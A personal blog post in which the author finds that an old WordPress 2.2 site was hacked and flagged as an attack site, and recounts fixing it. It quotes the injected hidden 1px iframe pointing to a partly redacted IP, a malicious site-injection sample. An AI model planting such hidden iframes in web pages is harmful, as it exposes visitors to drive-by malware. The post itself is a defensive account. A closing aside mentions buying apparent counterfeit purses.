Disclosure: This post may contain affiliate links, meaning we get a commission if you decide to make a purchase through our links, at no cost to you. Please read our disclosure for more info.
Last Updated on March 6, 2018 by Work In My Pajamas
I stated last week that Mahalo declined 18 of the 19 links I recommended for inclusion. This was their reasoning…
Thank you for submitting, but we’re concerned that the content on this site contains hidden or somewhat misleading affiliate links.
But then I saw PreemieTwins.com was declined for…
This site is a reported attack site.
WTF!? I made that site eons ago for my premature twins. So now, as if I’m not busy enough, I have to figure out what’s up.
I googled “preemie twins” and AVG said “This page contains no active threats.” but…. Google says “This site may harm your computer.” Double WTF. I can rank #1 for those keywords, but who’s gonna visit after Google says my site will install malicious software on their computer!? First of all, I’m a big advocate AGAINST malware (since it steals MY commissions), and second of all, I don’t think I’m smart enough to even create such scum.
So, my first inclination was that it’s the free wordpress theme I used, so changed that. Nope, that wasn’t the problem. Wasn’t any of my plug-ins either. So, it had to be in my post content.
I go to edit the top post, and there I see it…
< i frame src= ” http: //61.xxx.x.xxx/ iframe/wp-stats.php ” frameborder=”0″ height=”1″ width=”1″>< / i frame>
So I google that and found my answer on the WordPress forum. My site was injected with a 1px iframe due to a vulnerability in WordPress 2.2. And yep, I still had 2.2 installed on that site. I’m pretty good about updating to the latest version of WP on my blogs, but this particular blog doesn’t get a lot of my attention as of lately.
So I immediately updated to WordPress 2.6 – I suggest anyone that still uses 2.2 to do the same RIGHT NOW! But now I have to manually edit EACH and EVERY post as they deposited all kinds of scum links.
That IP address was from China. I just got a package today from China of some Coach purses. They claim they are “authentic”, but c’mon, I got them for a mere fraction of the retail cost. I think they are just damn good knock-offs, but no one has been the wiser.
